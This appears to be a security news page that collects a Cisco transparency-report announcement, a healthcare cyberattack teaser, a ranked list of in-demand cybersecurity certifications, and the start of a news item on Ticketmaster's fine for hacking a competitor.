As our customers’ businesses evolve in complexity and scale, we are hyperaware of our responsibility as a data steward to protect the privacy and trusted relationships that drive our business forward.

For many years, Cisco has published* the number of demands for customer data that we receive from law enforcement and governments around the world. In an age of growing geopolitical tensions, evolving threat landscapes, and increasing demands for corporate transparency, tech companies must stay focused on the steps they are taking to ensure customer privacy is recognized as a human right and a business imperative. A human focus is at the heart of every aspect of Cisco innovation, and we continuously work to make this apparent to our customers.

We listen to our customers’ security and privacy concerns as a guide to help shape our company and practices, all with a goal of being a trusted partner at every step. In response, we have refreshed our Transparency Report to answer our customers’ top questions about government data demands. Our leading additions are outlined below.

Global Map

The interactive map gives geographic granularity to the very limited number of demands we receive from around the world. It shows total disclosures of customer data by country and notes why some demands did not result in disclosure. One key metric in each country breakdown is the number of demands Cisco rejected during the given timeframe. We hold law enforcement and governments to our commitments to protect customer data, which often means rejecting requests that don’t meet our standards. Additionally, Cisco often does not have the data law enforcement is looking for, as shown by the “no data disclosed” metric.

Law Enforcement Guidelines

For the first time, we are publishing law enforcement guidelines to inform our customers and law enforcement agencies about the ways we protect customer data. They outline the legal burden placed on law enforcement agencies and governments when demanding customer data, and the laws to which these demands are subject. Cisco recognizes and appreciates government efforts to thwart bad actors and deter criminal activity. Nonetheless, we remain committed to ensuring that access to our solutions and services is protected from unlawful intrusion.

Frequently Asked Questions

At Cisco, we are constantly working on clear and simple communication to our customers, especially when it comes to important topics, like the ways in which we are protecting your data. We’ve added a Frequently Asked Questions (FAQ) section to guide customers through this crucial discussion. In this section, we reiterate that Cisco never allows backdoors or gives governments or law enforcement agencies direct access to content or non-content data without following appropriate legal process.

Our commitment to customers is to be open and transparent, particularly as it relates to issues that could potentially impact their business. As such, Our Principled Approach continues to guide every decision we make regarding government demands for customer data. It details the commitments we have made to protect customer privacy, minimize disclosure, and ensure we uphold and respect human rights.

To learn more about Cisco’s commitment to Transparency and Accountability, please visit our Trust Center or view our Global Data Demand Infographic. Questions about our Transparency Report or Our Principled Approach? Email: govt-data-requests@cisco.com

*Transparency report data is published twice yearly, covering a reporting period of either January-to-June or July-to-December. Cisco publishes this data six months after the end of a given reporting period, in compliance with legal restrictions on the timing of such reports.

Healthcare Industry Witnessed 45% Spike in Cyber Attacks Since Nov 20

Cyberattacks targeting healthcare organizations have spiked by 45% since November 2020 as COVID-19 cases continue to increase globally. According to a new report published by Check Point Research today and shared with The Hacker News, this increase has made the sector the most targeted industry by cybercriminals when compared to an overall 22% increase in cyberattacks across all industry sectors

The Top Cybersecurity Certifications in 2021

What are the Most Valued Cybersecurity Certifications in 2021?
This is an important question for employers, recruiters, seasoned security professionals, and especially for those planning a cybersecurity career. The Information Security Careers Network (ISCN) recently surveyed its LinkedIn community of over 90,000 members about the 50 leading cybersecurity industry certifications and courses. The results have been compiled into the following top ten list of the most desired cybersecurity certifications in 2021.

CyberSecurity Certificates in High Demand by Employers
The Top Ten CyberSecurity Certificates and Courses

10. SANS Penetration Testing Courses
The selection of penetration testing courses and certifications offered by the SANS Institute is well regarded for helping beginners and experts alike to increase their technical cybersecurity expertise and pay grades. The SANS/GIAC Penetration Tester (GPEN)
9. Cybersecurity or Information Security University Degree
A cybersecurity or information security university degree is recommended for those looking to ‘jumpstart’ a cybersecurity career, and for those with senior management and leadership roles as a career goal. However, most cybersecurity professionals surveyed by ISCN did not rate a degree as valuable compared with building up ‘real world’ experience in dedicated junior security roles.

First or second class cybersecurity themed degrees with work experience (i.e. a sandwich course) from a reputable university can help a candidate's CV stand out from the crowd, but don't expect to walk straight into senior security professional roles without building up years of in-role experience.

The Times Higher Educational guide provides a list of the top universities offering computer science degrees.

8. Certified Cloud Security Professional (CCSP) by ISC2
Despite dropping a couple of places from last year’s ISCN survey, the Certified Cloud Security Professional (CCSP) from ISC2 remains popular among survey respondents, with 15% stating their intention to complete the course within the next 12-24 months.

The popularity of CCSP has grown with the migration from on-premises IT to cloud computing in recent years, which has left organisations short of expert security resources to help secure the cloud services on which they now depend.

CCSP is suitable for mid- to advanced-level professionals involved with information security, IT architecture, governance, web and cloud security engineering, risk and compliance, as well as IT auditing. CCSP credential holders are competent in the following six domains:
  • Architectural Concepts and Design Requirements
  • Cloud Data Security
  • Cloud Platform and Infrastructure Security
  • Cloud Application Security
  • Operations
  • Legal and Compliance
Aside from passing the CCSP exam, ISC2 requires candidates to have a minimum of 5 years of work experience, including at least 1 year of cloud security experience and 3 years of information security experience.

7. CompTIA Security+
CompTIA Security+ is considered one of the best introductory security qualifications, suited for those taking their first steps in building a cybersecurity career.  As a globally recognised security certification, holding the CompTIA Security+ certification demonstrates knowledge of the baseline skills necessary to perform core security roles and functions. 

CompTIA Security+ provides a good platform on which to build an IT security career. It is useful for gaining junior security roles that help build up all-important in-role experience, and it serves as a good foundation for the more advanced topics found in the elite security certifications. 26% of survey respondents praised CompTIA Security+ for its relevance to real-world scenarios.

6. Certified Chief Information Security Officer (CCISO) by EC-Council
Increasing in popularity in recent years is the Certified Chief Information Security Officer (CCISO) by the EC-Council, which is suitable for those seeking promotion into senior managerial, leadership, and executive-level positions. 33% of the cybersecurity professionals surveyed said this course is one of the best for equipping participants to succeed in managerial positions.

CCISO is considered the industry-leading CISO training course. To achieve the certification, five years of experience in each of the course’s five domains is required, along with passing the CCISO exam.
  1. Governance and Risk Management
  2. Information Security Controls, Compliance, and Audit Management
  3. Security Program Management and Operations
  4. Information Security Core Competencies
  5. Strategic Planning, Finance, Procurement, Vendor Management
5. Cisco Certified Network Professional (CCNP) Security
The Cisco Certified Network Professional (CCNP) Security certification remains a network security certification desired by employers, with 23% of respondents citing CCNP Security as in demand. As a professional-level technical certification, CCNP requires passing a core exam and a ‘concentration exam’ of your choice.

4. Certified Ethical Hacker (CEH) by EC-Council
EC-Council’s Certified Ethical Hacker (CEH) qualification consistently ranks near the top of the security accreditations in highest demand within the industry. The CEH course teaches, in practical terms, how to use the latest commercial-grade hacking tools, techniques and methodologies to hack organisations ethically and lawfully.

The CEH online training course covers 18 security domains and over 270 attack methods and technologies, and the certification requires passing a four-hour, 125-question exam covering the course domains, technologies and hacking techniques. Achieving CEH certification can open the door to lucrative and in-demand penetration tester roles, so it is little surprise that 21% of respondents stated their intent to take the CEH course within the next 12-24 months.

The EC-Council also provides the following well-valued courses and certifications, which didn’t quite make it into this top ten.
3. Certified Information Security Manager (CISM) by ISACA
As its title suggests, the Certified Information Security Manager (CISM) by ISACA is suited for security management roles and is one of the most respected certifications within the security industry. The CISM is not suited for beginners: a minimum of five years of dedicated in-role cybersecurity / information security experience is required for certification.

The CISM course is designed for security managers, so has a strong focus on governance, strategy, and policies, which are split across four subject matter domains:
  1. Information Security Governance (24%)
  2. Information Risk Management (30%)
  3. Information Security Program Development and Management (27%)
  4. Information Security Incident Management (19%)
According to a 2020 salary study by Forbes, CISM placed 3rd overall with an impressive annual salary of £110,000 ($148,622 USD), the highest of the dedicated security certifications listed in the study.

2. PWK OSCP by Offensive Security

Penetration Testing with Kali Linux (PWK, course code PEN-200) is Offensive Security’s online ethical hacking course. It is self-paced and introduces penetration testing tools and techniques through hands-on experience. PEN-200 trains not only the skills but also the mindset required to be a successful penetration tester. Students who complete the course and pass the exam earn the Offensive Security Certified Professional (OSCP) certification.

The course ranked highly in the survey. Cybersecurity professionals said it had strong relevance to the ‘real world’, and ranked the OSCP qualification second in terms of how much it is in demand by employers.

1. Certified Information Systems Security Professional (CISSP) by ISC2
The ISC2 Certified Information Systems Security Professional (CISSP) remains the security certification in the greatest demand within the security industry. A whopping 72% of those surveyed said the CISSP certification was the most in demand by employers.

CISSP is a longstanding and globally well-respected information security professional certification. Like the CISM, the CISSP is not aimed at beginners. The certification requires 5 years of in-role information security experience, or 4 years if you hold a cyber / information security-related degree.

The three-hour, 100-to-150-question CISSP exam has proven notoriously difficult for some to pass because the CISSP course covers a very broad spectrum of information security disciplines, split across eight domains.

The CISSP 8 domains are:
  1. Security and Risk Management (15%)
  2. Asset Security (10%)
  3. Security Architecture and Engineering (13%)
  4. Communication and Network Security (13%)
  5. Identity and Access Management (IAM) (13%)
  6. Security Assessment and Testing (12%)
  7. Security Operations (13%)
  8. Software Development Security (11%)
ISC2 also offers several CISSP ‘concentration’ courses and exams for those holding the CISSP, which demonstrate advanced knowledge in specific areas of security. While CISSP concentrations tend not to be specifically sought by employers in job ads, they can help you stand out from the crowd as a subject matter expert in a specific area of security.

For those nearer the start of their cybersecurity career journey, ISC2 offers the Associate of ISC2 as a gateway towards achieving the CISSP.

Let us know your top ten in the comments.

Survey data for this post is kindly provided by the Information Security Careers Network (ISCN).

Ticketmaster To Pay $10 Million Fine For Hacking A Rival Company

Ticketmaster has agreed to pay a $10 million fine after being charged with illegally accessing computer systems of a competitor repeatedly between 2013 and 2015 in an attempt to "cut [the company] off at the knees." A subsidiary of Live Nation, the California-based ticket sales and distribution company used the stolen information to gain an advantage over CrowdSurge — which merged with Songkick